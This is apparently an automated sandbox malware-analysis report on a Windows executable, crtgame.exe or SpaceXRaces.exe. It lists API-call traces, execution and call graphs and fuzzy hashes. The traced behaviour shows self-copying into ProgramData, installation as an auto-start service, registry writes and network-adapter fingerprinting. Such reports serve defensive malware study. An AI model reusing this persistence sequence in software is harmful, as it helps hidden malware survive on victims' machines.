                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,0049A628), ref: 00456C11
                                                                                            • FileTimeToSystemTime.KERNEL32(00000000,$pI,00000000,0049A628), ref: 00456C28
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$FileSystem
                                                                                            • String ID: $pI
                                                                                            • API String ID: 2086374402-3761944556
                                                                                            • Opcode ID: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
                                                                                            • Instruction ID: 229b1bfa25ea94c428731b1611971c6890b9b5f6c230ce37e6a86d23df0ccc86
                                                                                            • Opcode Fuzzy Hash: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
                                                                                            • Instruction Fuzzy Hash: DFD05B7340830C66CF01F1E5AC82CCFB79CD504324F100677A118A25C1FE39A654565C
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastSleep
                                                                                            • String ID:
                                                                                            • API String ID: 1458359878-0
                                                                                            • Opcode ID: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
                                                                                            • Instruction ID: 9275ee504a9eb35dba3a5523cc5197587f06a42b27f59d217f7189e04cd8cbf1
                                                                                            • Opcode Fuzzy Hash: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
                                                                                            • Instruction Fuzzy Hash: 1FF024B6B04514678F20E99FD881B2F62CCDAD836E710012BFC04DF343C438EE8986A9

                                                                                            Execution Graph

                                                                                            Execution Coverage:21.7%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:13.5%
                                                                                            Total number of Nodes:399
                                                                                            Total number of Limit Nodes:7
                                                                                            execution_graph 2499 404b30 2500 404b38 2499->2500 2501 404bca 2500->2501 2503 404a40 RtlUnwind 2500->2503 2504 404a58 2503->2504 2504->2500 2036 402f72 GetVersion 2061 4032aa HeapCreate 2036->2061 2038 402fd1 2039 402fd6 2038->2039 2040 402fde 2038->2040 2161 40308d 2039->2161 2073 404892 2040->2073 2044 402fe6 GetCommandLineA 2087 404760 2044->2087 2048 403000 2119 40445a 2048->2119 2050 403005 2051 40300a GetStartupInfoA 2050->2051 2132 404402 2051->2132 2053 40301c GetModuleHandleA 2136 4026f0 GetModuleHandleA GetModuleFileNameA 2053->2136 2056 403040 2167 4041a9 2056->2167 2062 403300 2061->2062 2063 4032ca 2061->2063 2062->2038 2174 403162 2063->2174 2066 4032e6 2068 403303 2066->2068 2188 403b58 2066->2188 2067 4032d9 2186 403307 HeapAlloc 2067->2186 2068->2038 2071 4032e3 2071->2068 2072 4032f4 HeapDestroy 2071->2072 2072->2062 2251 402ec0 2073->2251 2075 4048b1 GetStartupInfoA 2083 4049c2 2075->2083 2086 4048fd 2075->2086 2079 4049e9 GetStdHandle 2082 4049f7 GetFileType 2079->2082 2079->2083 2080 404a29 SetHandleCount 2080->2044 2081 402ec0 12 API calls 2081->2086 2082->2083 2083->2079 2083->2080 2084 40496e 2084->2083 2085 404990 GetFileType 2084->2085 2085->2084 2086->2081 2086->2083 2086->2084 2088 40477b GetEnvironmentStringsW 2087->2088 2089 4047ae 2087->2089 2090 404783 2088->2090 2091 40478f GetEnvironmentStrings 2088->2091 2089->2090 2093 40479f 2089->2093 2094 4047c7 WideCharToMultiByte 2090->2094 2095 4047bb GetEnvironmentStringsW 2090->2095 2092 402ff6 2091->2092 2091->2093 2110 404513 2092->2110 2093->2092 2096 404841 GetEnvironmentStrings 2093->2096 2097 40484d 2093->2097 2099 4047fb 2094->2099 2100 40482d FreeEnvironmentStringsW 2094->2100 2095->2092 2095->2094 2096->2092 2096->2097 2101 402ec0 12 API calls 2097->2101 2102 402ec0 12 API calls 2099->2102 2100->2092 2108 404868 2101->2108 2103 404801 2102->2103 2103->2100 2104 40480a WideCharToMultiByte 2103->2104 2106 404824 2104->2106 2107 40481b 2104->2107 2105 40487e FreeEnvironmentStringsA 2105->2092 2106->2100 2317 4030b1 2107->2317 2108->2105 2111 404525 2110->2111 2112 40452a GetModuleFileNameA 2110->2112 2347 40588b 2111->2347 2114 40454d 2112->2114 2115 402ec0 12 API calls 2114->2115 2116 40456e 2115->2116 2117 40457e 2116->2117 2118 403068 7 API calls 2116->2118 2117->2048 2118->2117 2120 404467 2119->2120 2122 40446c 2119->2122 2121 40588b 19 API calls 2120->2121 2121->2122 2123 402ec0 12 API calls 2122->2123 2124 404499 2123->2124 2125 403068 7 API calls 2124->2125 2130 4044ad 2124->2130 2125->2130 2126 4044f0 2127 4030b1 7 API calls 2126->2127 2128 4044fc 2127->2128 2128->2050 2129 402ec0 12 API calls 2129->2130 2130->2126 2130->2129 2131 403068 7 API calls 2130->2131 2131->2130 2133 40440b 2132->2133 2135 404410 2132->2135 2134 40588b 19 API calls 2133->2134 2134->2135 2135->2053 2371 402dd0 2136->2371 2141 402776 lstrcmpiW 2143 402788 2141->2143 2144 4027ed lstrcmpiW 2141->2144 2142 402948 StartServiceCtrlDispatcherA 2142->2056 2143->2142 2152 4027a7 2143->2152 2157 4027e8 2143->2157 2145 402805 2144->2145 2146 40289c lstrcmpiW 2144->2146 2377 402548 2145->2377 2146->2142 2147 4028ae RegCreateKeyExA 2146->2147 2149 4028d0 2147->2149 2150 40292f SetEvent 2147->2150 2156 4028e2 GetTickCount wsprintfA RegSetValueExA RegCloseKey 2149->2156 2396 402351 2150->2396 2159 4027bc CreateFileA CloseHandle ExitProcess 2152->2159 2154 402812 RegCreateKeyExA 2154->2142 2155 402838 2154->2155 2160 40284a GetTickCount wsprintfA RegSetValueExA RegCloseKey 2155->2160 2156->2150 2157->2142 2160->2142 2162 403096 2161->2162 2163 40309b 2161->2163 2164 404c10 7 API calls 2162->2164 2165 404c49 7 API calls 2163->2165 2164->2163 2166 4030a4 ExitProcess 2165->2166 2456 4041cb 2167->2456 2170 40427e 2171 40428a 2170->2171 2172 4043b3 UnhandledExceptionFilter 2171->2172 2173 40305a 2171->2173 2172->2173 2197 402da0 2174->2197 2177 4031a5 GetEnvironmentVariableA 2181 4031c4 2177->2181 2185 403282 2177->2185 2178 40318b 2178->2177 2180 40319d 2178->2180 2180->2066 2180->2067 2182 403209 GetModuleFileNameA 2181->2182 2183 403201 2181->2183 2182->2183 2183->2185 2199 404d9c 2183->2199 2185->2180 2202 403135 GetModuleHandleA 2185->2202 2187 403323 2186->2187 2187->2071 2189 403b65 2188->2189 2190 403b6c HeapAlloc 2188->2190 2191 403b89 VirtualAlloc 2189->2191 2190->2191 2196 403bc1 2190->2196 2192 403ba9 VirtualAlloc 2191->2192 2193 403c7e 2191->2193 2194 403c70 VirtualFree 2192->2194 2192->2196 2195 403c86 HeapFree 2193->2195 2193->2196 2194->2193 2195->2196 2196->2071 2198 402dac GetVersionExA 2197->2198 2198->2177 2198->2178 2204 404db3 2199->2204 2203 40314c 2202->2203 2203->2180 2206 404dcb 2204->2206 2208 404dfb 2206->2208 2211 405afa 2206->2211 2207 405afa 6 API calls 2207->2208 2208->2207 2210 404daf 2208->2210 2215 405a2e 2208->2215 2210->2185 2212 405b18 2211->2212 2214 405b0c 2211->2214 2221 405dbe 2212->2221 2214->2206 2216 405a59 2215->2216 2219 405a3c 2215->2219 2217 405a75 2216->2217 2218 405afa 6 API calls 2216->2218 2217->2219 2233 405b6f 2217->2233 2218->2217 2219->2208 2222 405def GetStringTypeW 2221->2222 2226 405e07 2221->2226 2224 405e0b GetStringTypeA 2222->2224 2222->2226 2223 405e32 GetStringTypeA 2227 405ef3 2223->2227 2224->2226 2224->2227 2226->2223 2228 405e56 2226->2228 2227->2214 2228->2227 2229 405e6c MultiByteToWideChar 2228->2229 2229->2227 2230 405e90 2229->2230 2230->2227 2231 405eca MultiByteToWideChar 2230->2231 2231->2227 2232 405ee3 GetStringTypeW 2231->2232 2232->2227 2234 405bbb 2233->2234 2235 405b9f LCMapStringW 2233->2235 2238 405c21 2234->2238 2239 405c04 LCMapStringA 2234->2239 2235->2234 2236 405bc3 LCMapStringA 2235->2236 2236->2234 2237 405cfd 2236->2237 2237->2219 2238->2237 2240 405c37 MultiByteToWideChar 2238->2240 2239->2237 2240->2237 2241 405c61 2240->2241 2241->2237 2242 405c97 MultiByteToWideChar 2241->2242 2242->2237 2243 405cb0 LCMapStringW 2242->2243 2243->2237 2244 405ccb 2243->2244 2245 405cd1 2244->2245 2247 405d11 2244->2247 2245->2237 2246 405cdf LCMapStringW 2245->2246 2246->2237 2247->2237 2248 405d49 LCMapStringW 2247->2248 2248->2237 2249 405d61 WideCharToMultiByte 2248->2249 2249->2237 2260 402ed2 2251->2260 2254 403068 2255 403071 2254->2255 2256 403076 2254->2256 2297 404c10 2255->2297 2303 404c49 2256->2303 2261 402ecf 2260->2261 2263 402ed9 2260->2263 2261->2075 2261->2254 2263->2261 2264 402efe 2263->2264 2265 402f0d 2264->2265 2268 402f22 2264->2268 2272 402f1b 2265->2272 2273 4036a3 2265->2273 2267 402f61 HeapAlloc 2269 402f70 2267->2269 2268->2267 2268->2272 2279 403e50 2268->2279 2269->2263 2270 402f20 2270->2263 2272->2267 2272->2269 2272->2270 2275 4036d5 2273->2275 2274 403783 2274->2272 2275->2274 2278 403774 2275->2278 2286 4039ac 2275->2286 2278->2274 2293 403a5d 2278->2293 2284 403e5e 2279->2284 2280 403f4a VirtualAlloc 2285 403f1b 2280->2285 2281 40401f 2282 403b58 5 API calls 2281->2282 2282->2285 2284->2280 2284->2281 2284->2285 2285->2272 2287 4039ef HeapAlloc 2286->2287 2288 4039bf HeapReAlloc 2286->2288 2290 403a15 VirtualAlloc 2287->2290 2292 403a3f 2287->2292 2289 4039de 2288->2289 2288->2292 2289->2287 2291 403a2f HeapFree 2290->2291 2290->2292 2291->2292 2292->2278 2294 403a6f VirtualAlloc 2293->2294 2296 403ab8 2294->2296 2296->2274 2298 404c1a 2297->2298 2299 404c47 2298->2299 2300 404c49 7 API calls 2298->2300 2299->2256 2301 404c31 2300->2301 2302 404c49 7 API calls 2301->2302 2302->2299 2305 404c5c 2303->2305 2304 404d73 2307 404d86 GetStdHandle WriteFile 2304->2307 2305->2304 2306 404c9c 2305->2306 2311 40307f 2305->2311 2308 404ca8 GetModuleFileNameA 2306->2308 2306->2311 2307->2311 2309 404cc0 2308->2309 2312 4058a7 2309->2312 2311->2075 2313 4058b4 LoadLibraryA 2312->2313 2315 4058f6 2312->2315 2314 4058c5 GetProcAddress 2313->2314 2313->2315 2314->2315 2316 4058dc GetProcAddress GetProcAddress 2314->2316 2315->2311 2316->2315 2318 4030bd 2317->2318 2326 4030d9 2317->2326 2321 4030c7 2318->2321 2322 4030dd 2318->2322 2319 403108 2320 403109 HeapFree 2319->2320 2320->2326 2321->2320 2323 4030d3 2321->2323 2322->2319 2325 4030f7 2322->2325 2328 40337a 2323->2328 2334 403e0b 2325->2334 2326->2106 2329 4033b8 2328->2329 2333 40366e 2328->2333 2330 4035b4 VirtualFree 2329->2330 2329->2333 2331 403618 2330->2331 2332 403627 VirtualFree HeapFree 2331->2332 2331->2333 2332->2333 2333->2326 2335 403e38 2334->2335 2336 403e4e 2334->2336 2335->2336 2338 403cf2 2335->2338 2336->2326 2341 403cff 2338->2341 2339 403daf 2339->2336 2340 403d20 VirtualFree 2340->2341 2341->2339 2341->2340 2343 403c9c VirtualFree 2341->2343 2344 403cb9 2343->2344 2345 403ce9 2344->2345 2346 403cc9 HeapFree 2344->2346 2345->2341 2346->2341 2348 405894 2347->2348 2349 40589b 2347->2349 2351 4054c7 2348->2351 2349->2112 2358 405660 2351->2358 2355 40550a GetCPInfo 2357 40551e 2355->2357 2356 405654 2356->2349 2357->2356 2363 405706 GetCPInfo 2357->2363 2359 405680 2358->2359 2360 405670 GetOEMCP 2358->2360 2361 4054d8 2359->2361 2362 405685 GetACP 2359->2362 2360->2359 2361->2355 2361->2356 2361->2357 2362->2361 2365 405729 2363->2365 2370 4057f1 2363->2370 2364 405dbe 6 API calls 2366 4057a5 2364->2366 2365->2364 2367 405b6f 9 API calls 2366->2367 2368 4057c9 2367->2368 2369 405b6f 9 API calls 2368->2369 2369->2370 2370->2356 2372 40273c GetCommandLineW CommandLineToArgvW GetLocalTime 2371->2372 2373 401fbe 2372->2373 2374 401fd3 2373->2374 2403 401a1d 2374->2403 2376 401fdc 2376->2141 2376->2142 2378 402569 2377->2378 2379 402576 GetModuleHandleA GetModuleFileNameA 2378->2379 2380 402ec0 12 API calls 2379->2380 2381 402595 2380->2381 2382 402ec0 12 API calls 2381->2382 2383 4025a6 2382->2383 2384 4025db GetModuleHandleA GetModuleFileNameW RegOpenKeyExA 2383->2384 2385 4026d6 2384->2385 2386 402616 RegQueryValueExA 2384->2386 2385->2142 2385->2154 2386->2385 2387 402640 RegCloseKey 2386->2387 2388 402654 2387->2388 2389 402660 CreateDirectoryA 2388->2389 2390 402676 2389->2390 2391 402688 CopyFileA 2390->2391 2391->2385 2392 40269e OpenSCManagerA 2391->2392 2392->2385 2393 4026af CreateServiceA 2392->2393 2394 4026dd CloseServiceHandle CloseServiceHandle 2393->2394 2395 4026cd CloseServiceHandle 2393->2395 2394->2385 2395->2385 2397 402362 WaitForSingleObject 2396->2397 2398 402368 2397->2398 2399 4023cc ExitProcess 2397->2399 2401 4023b1 Sleep 2398->2401 2441 4021c6 VirtualAlloc 2398->2441 2448 401ffb FindResourceA 2398->2448 2401->2397 2404 401a2c 2403->2404 2411 401a58 CreateFileA 2404->2411 2410 401a47 2410->2376 2412 401a86 2411->2412 2413 401a35 2411->2413 2414 401aa1 DeviceIoControl 2412->2414 2415 401b43 CloseHandle 2412->2415 2417 401b17 GetLastError 2412->2417 2431 402d06 2412->2431 2434 402cf8 2412->2434 2419 401b54 LoadLibraryA 2413->2419 2414->2412 2415->2413 2417->2412 2417->2415 2420 401b77 GetProcAddress 2419->2420 2421 401a3e 2419->2421 2422 401c21 FreeLibrary 2420->2422 2423 401b8e 2420->2423 2428 401c2f 2421->2428 2422->2421 2424 401b9e GetAdaptersInfo 2423->2424 2425 402d06 7 API calls 2423->2425 2426 401c1e 2423->2426 2427 402cf8 12 API calls 2423->2427 2424->2423 2425->2423 2426->2422 2427->2423 2437 401c5b GetWindowsDirectoryA 2428->2437 2430 401c3e 2430->2410 2432 4030b1 7 API calls 2431->2432 2433 402d0f 2432->2433 2433->2412 2435 402ed2 12 API calls 2434->2435 2436 402d03 2435->2436 2436->2412 2438 401cb7 2437->2438 2439 401c7e CreateFileA 2437->2439 2438->2430 2439->2438 2440 401ca2 GetFileTime CloseHandle 2439->2440 2440->2438 2445 4021f8 2441->2445 2442 40230a 2444 402331 Sleep 2442->2444 2443 402293 GetLastError LoadLibraryExA 2443->2445 2446 402347 2444->2446 2445->2442 2445->2443 2447 4022dc GetProcAddress 2445->2447 2446->2398 2447->2445 2449 402036 2448->2449 2450 40201d GetLastError SizeofResource 2448->2450 2449->2398 2450->2449 2451 40203d LoadResource LockResource GlobalAlloc 2450->2451 2452 402069 2451->2452 2453 402092 GetTickCount 2452->2453 2455 40209c GlobalAlloc 2453->2455 2455->2449 2457 4041d7 GetCurrentProcess TerminateProcess 2456->2457 2460 4041e8 2456->2460 2457->2460 2458 403049 2458->2170 2459 404252 ExitProcess 2460->2458 2460->2459 2466 405c83 2467 405c92 2466->2467 2468 405c97 MultiByteToWideChar 2467->2468 2472 405cfd 2467->2472 2469 405cb0 LCMapStringW 2468->2469 2468->2472 2470 405ccb 2469->2470 2469->2472 2471 405cd1 2470->2471 2473 405d11 2470->2473 2471->2472 2474 405cdf LCMapStringW 2471->2474 2473->2472 2475 405d49 LCMapStringW 2473->2475 2474->2472 2475->2472 2476 405d61 WideCharToMultiByte 2475->2476 2476->2472 2478 4023d3 2479 402425 2478->2479 2480 4023da 2478->2480 2480->2479 2481 4023e5 GetLastError SetServiceStatus SetEvent 2480->2481 2481->2479 2505 405d37 2506 405d45 2505->2506 2507 405d49 LCMapStringW 2506->2507 2510 405cfd 2506->2510 2508 405d61 WideCharToMultiByte 2507->2508 2507->2510 2508->2510 2492 402428 RegisterServiceCtrlHandlerA 2493 402541 2492->2493 2494 40244b 2492->2494 2495 402459 SetServiceStatus GetLastError CreateEventA 2494->2495 2496 4024d2 SetServiceStatus CreateThread WaitForSingleObject CloseHandle 2495->2496 2497 4024b3 GetLastError 2495->2497 2498 402538 SetServiceStatus 2496->2498 2497->2498 2498->2493 2511 404b38 2512 404bca 2511->2512 2514 404b56 2511->2514 2513 404a40 RtlUnwind 2513->2514 2514->2512 2514->2513 2461 4041cb 2462 4041d7 GetCurrentProcess TerminateProcess 2461->2462 2465 4041e8 2461->2465 2462->2465 2463 404262 2464 404252 ExitProcess 2465->2463 2465->2464 2515 405ebb 2516 405ec2 2515->2516 2517 405ef3 2516->2517 2518 405eca MultiByteToWideChar 2516->2518 2518->2517 2519 405ee3 GetStringTypeW 2518->2519 2519->2517 2482 40305d 2489 4041ba 2482->2489 2484 403068 2485 403076 2484->2485 2486 404c10 7 API calls 2484->2486 2487 404c49 7 API calls 2485->2487 2486->2485 2488 40307f 2487->2488 2490 4041cb 3 API calls 2489->2490 2491 4041c7 2490->2491 2491->2484

                                                                                            Callgraph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            • Opacity -> Relevance
                                                                                            • Disassembly available
                                                                                            callgraph 0 Function_00404A40 1 Function_00402548 65 Function_00402EC0 1->65 72 Function_00402DD0 1->72 79 Function_00402DE0 1->79 105 Function_00402CA0 1->105 2 Function_00404C49 52 Function_00402D20 2->52 58 Function_00405930 2->58 2->72 2->79 109 Function_004058A7 2->109 3 Function_0040334F 4 Function_00405150 5 Function_00403E50 11 Function_00403B58 5->11 12 Function_00404058 5->12 5->105 6 Function_00401051 7 Function_00402351 67 Function_004021C6 7->67 86 Function_00401FF7 7->86 89 Function_00401FFB 7->89 8 Function_00401B54 38 Function_00402D06 8->38 8->52 70 Function_004018CC 8->70 87 Function_00402CF8 8->87 9 Function_00404A58 10 Function_00401A58 10->38 10->52 10->70 10->87 11->105 13 Function_00405359 14 Function_0040445A 24 Function_00403068 14->24 14->52 14->65 14->72 96 Function_0040588B 14->96 115 Function_004030B1 14->115 15 Function_00401C5B 16 Function_0040305D 16->2 45 Function_00404C10 16->45 119 Function_004041BA 16->119 17 Function_00403A5D 18 Function_00404A60 19 Function_00405660 20 Function_00404760 21 Function_00402960 20->21 20->65 20->115 22 Function_00403162 44 Function_00405110 22->44 62 Function_00403135 22->62 71 Function_00404FD0 22->71 98 Function_00405090 22->98 103 Function_00404D9C 22->103 106 Function_00402DA0 22->106 23 Function_00404264 24->2 24->45 25 Function_00405368 26 Function_00402B69 27 Function_00405B6F 101 Function_00405D93 27->101 27->106 28 Function_00402F72 28->14 28->20 31 Function_0040417C 28->31 32 Function_0040427E 28->32 36 Function_00404402 28->36 47 Function_00404513 28->47 83 Function_004026F0 28->83 97 Function_0040308D 28->97 100 Function_00404892 28->100 110 Function_004041A9 28->110 111 Function_004032AA 28->111 29 Function_00402B78 30 Function_0040337A 30->4 31->23 124 Function_004043BF 32->124 33 Function_00405C7F 34 Function_00401000 35 Function_0040A400 95 Function_00405485 36->95 36->96 37 Function_00405706 37->27 123 Function_00405DBE 37->123 38->115 39 Function_00403307 40 Function_0040A408 41 Function_00403E0B 84 Function_00403CF2 41->84 42 Function_00404B0D 43 Function_0040530E 45->2 46 Function_00405210 47->24 47->65 47->96 114 Function_004045AC 47->114 48 Function_00404B16 49 Function_0040311A 50 Function_00401A1D 50->8 50->10 55 Function_00401029 50->55 57 Function_00401C2F 50->57 92 Function_00401982 50->92 51 Function_00402B1E 53 Function_00402A20 54 Function_00402428 54->105 56 Function_00405A2E 56->27 88 Function_00405AFA 56->88 57->15 57->70 59 Function_00404B30 59->0 59->48 93 Function_00404A82 59->93 60 Function_00402132 61 Function_00405D33 63 Function_00405D37 64 Function_00404B38 64->0 64->48 64->93 73 Function_00402ED2 65->73 66 Function_00404FC5 67->21 67->60 67->105 68 Function_004054C7 68->19 68->37 78 Function_004056DD 68->78 112 Function_004056AA 68->112 69 Function_004041CB 69->23 70->6 70->21 70->34 73->49 91 Function_00402EFE 73->91 74 Function_004023D3 75 Function_004092D3 76 Function_004051D5 77 Function_00402DD7 80 Function_004029E5 81 Function_00404AEA 82 Function_004051EC 83->1 83->7 83->52 83->72 83->79 83->105 122 Function_00401FBE 83->122 104 Function_00403C9C 84->104 85 Function_00404BF5 85->93 87->73 88->123 89->21 121 Function_00401CBD 89->121 90 Function_004029FC 91->5 108 Function_004036A3 91->108 92->6 92->21 92->34 92->105 93->48 94 Function_00405C83 94->106 102 Function_00405496 95->102 96->68 97->2 97->45 99 Function_00405390 100->24 100->65 116 Function_00404DB3 103->116 107 Function_00402BA0 108->17 113 Function_004039AC 108->113 110->69 111->11 111->22 111->39 115->3 115->30 115->41 117 Function_00403DB4 115->117 116->56 116->88 118 Function_00405EB7 119->69 120 Function_00405EBB 122->50 122->105 123->105 123->106

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 00402714
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\CRTGame\crtgame.exe,00000104,?,00000000), ref: 0040272B
                                                                                            • GetCommandLineW.KERNEL32(?,?,00000000), ref: 00402748
                                                                                            • CommandLineToArgvW.SHELL32(00000000,?,00000000), ref: 0040274F
                                                                                            • GetLocalTime.KERNEL32(00409F20,?,00000000), ref: 0040275C
                                                                                            • lstrcmpiW.KERNELBASE(?,/chk,?,00000000), ref: 0040277E
                                                                                            • CreateFileA.KERNEL32(C:\Program Files (x86)\CRTGame\crtgame.exe,40000000,00000000,00000000,00000002,00000020,00000000,?,00000000), ref: 004027CB
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004027D2
                                                                                            • ExitProcess.KERNEL32 ref: 004027D9
                                                                                            • lstrcmpiW.KERNEL32(?,00407104,?,00000000), ref: 004027FB
                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\SpaceRaces,00000000,00000000,00000000,00000006,00000000,?,?,?,00000000), ref: 0040282A
                                                                                            • GetTickCount.KERNEL32 ref: 0040284D
                                                                                            • wsprintfA.USER32 ref: 00402865
                                                                                            • RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004), ref: 00402888
                                                                                            • RegCloseKey.KERNELBASE(?), ref: 00402891
                                                                                            • StartServiceCtrlDispatcherA.ADVAPI32(?,?,00000000), ref: 0040294C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCommandCreateFileHandleLineModulelstrcmpi$ArgvCountCtrlDispatcherExitLocalNameProcessServiceStartTickTimeValuewsprintf
                                                                                            • String ID: /chk$C:\Program Files (x86)\CRTGame\crtgame.exe$Software\SpaceRaces$SpaceXRaces$SpaceXRaces$test$tsr1209%d
                                                                                            • API String ID: 99468869-3986529438
                                                                                            • Opcode ID: 803341d37248f940fd6434f59c57290a4552a2c8ba3ceefaceaf479661161746
                                                                                            • Instruction ID: 49dc81ac6bcf3fd683536614608e289c009f5af55911e209b1bd681bcac14ea3
                                                                                            • Opcode Fuzzy Hash: 803341d37248f940fd6434f59c57290a4552a2c8ba3ceefaceaf479661161746
                                                                                            • Instruction Fuzzy Hash: 4B5131B1940209BFEB10DBA09E49FAE7BBCEB04345F104076F606F21E1D7789D148B69

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,00000000,7591F360,00000000), ref: 00402582
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,?,?,00000000,7591F360,00000000), ref: 00402589
                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000208,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7591F360), ref: 004025EA
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7591F360,00000000), ref: 004025F1
                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,?), ref: 00402608
                                                                                            • RegQueryValueExA.KERNELBASE(?,Common AppData,00000000,00000001,C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,?), ref: 00402632
                                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7591F360,00000000), ref: 00402643
                                                                                            • CreateDirectoryA.KERNELBASE(C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,00000000), ref: 00402665
                                                                                            • CopyFileA.KERNEL32(?,C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,00000000), ref: 00402694
                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 004026A2
                                                                                            • CreateServiceA.ADVAPI32(00000000,SpaceXRaces,SpaceXRaces,000F01FF,00000010,00000002,00000001,C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,00000000,00000000,00000000,00000000,00000000), ref: 004026C3
                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 004026D0
                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 004026E4
                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 004026E9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$CloseModuleService$File$CreateNameOpen$CopyDirectoryManagerQueryValue
                                                                                            • String ID: .exe$C:\ProgramData\SpaceXRaces\SpaceXRaces.exe$Common AppData$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$SpaceXRaces
                                                                                            • API String ID: 3461818117-4011302265
                                                                                            • Opcode ID: e4531a07c198f35eececefb098e8f84c19a8225dec0d5426053034b5013efb8f
                                                                                            • Instruction ID: a3d5b12e1f90bb5d6e2ef9e639674f7dcae6e36a2f4b11c7066e8bc7fc52f7b9
                                                                                            • Opcode Fuzzy Hash: e4531a07c198f35eececefb098e8f84c19a8225dec0d5426053034b5013efb8f
                                                                                            • Instruction Fuzzy Hash: 264193B1940108BBEB20ABA1DE4EE9F3A6CEF41749F00043AF601B11D2D7BD5D508A7D

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 65 401b54-401b71 LoadLibraryA 66 401b77-401b88 GetProcAddress 65->66 67 401c2a-401c2e 65->67 68 401c21-401c24 FreeLibrary 66->68 69 401b8e-401b97 66->69 68->67 70 401b9e-401bae GetAdaptersInfo 69->70 71 401bb0-401bb9 70->71 72 401be4-401bec 70->72 75 401bca-401be0 call 402d20 call 4018cc 71->75 76 401bbb-401bbf 71->76 73 401bf5-401bf9 72->73 74 401bee-401bf4 call 402d06 72->74 79 401bfb-401bff 73->79 80 401c1e-401c20 73->80 74->73 75->72 76->72 81 401bc1-401bc8 76->81 79->80 84 401c01-401c04 79->84 80->68 81->75 81->76 86 401c06-401c0c 84->86 87 401c0f-401c1c call 402cf8 84->87 86->87 87->70 87->80
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B66
                                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B7D
